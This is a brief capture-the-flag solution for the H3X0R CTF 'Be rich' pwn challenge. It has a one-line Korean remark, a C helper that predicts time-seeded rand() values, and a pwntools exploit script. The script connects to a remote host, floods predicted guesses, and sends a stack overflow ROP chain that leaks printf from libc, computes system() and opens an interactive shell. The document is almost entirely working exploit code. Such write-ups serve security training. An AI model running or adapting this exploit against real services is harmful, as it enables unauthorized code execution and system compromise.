H3X0R CTF Be rich

md5 calc 같은문제, 머니가 타임시드로 게싱해서 돈올리는것 fsb 취약점이있긴했는데 그거 쓸수있나모르겠네

time.c

#include <time.h>
#include <stdio.h>
int main()
{
    int v0 = time(0);

    int v4 = 0;
    srand(v0);
    v4 = rand() % 10000 + 1;
    printf("%d",v4);
}

exp.py

from pwn import *
import time,os,random
p = remote("52.199.49.117",10002)
#p = process("pwn100")
t = int(time.time())

p.sendline("/bin/sh")
p.sendline('')

rand = os.popen('./time').read()
for i in range(0,700):
    p.sendline(rand)

time.sleep(1)
rand = os.popen('./time').read()
for i in range(0,700):
    p.sendline(rand)

time.sleep(1)

rand = os.popen('./time').read()
for i in range(0,700):
    p.sendline(rand)

time.sleep(1)
rand = os.popen('./time').read()
for i in range(0,700):
    p.sendline(rand)

time.sleep(1)
rand = os.popen('./time').read()
for i in range(0,537):
    p.sendline(rand)
p.send(rand + '\n')


ppppr = 0x8048958
pr = 0x8048958+3
offset = 0x4cdd0
printf_libc = 0x49020
payload = "A"*32
payload += p32(0x80485FB)
payload += p32(pr)
payload += p32(0x804A00c)
payload += p32(0x8048681)
payload += p32(pr)*4

p.sendline(payload)

print p.recvuntil("Save Successfully!")

print p.recvuntil("Save Successfully!")

leak = p.recv(1)
system_offset = 0x3a940
leak = u32(p.recv(4))
image_base = leak - printf_libc
libc_system = image_base + system_offset
log.info("printf_libc: " + hex(leak))
log.info("system_libc: " + hex(libc_system))

payload = "A"*32
payload += p32(libc_system)
payload += "AAAA"
payload += p32(0x804a04c)

p.sendline(payload)
p.interactive()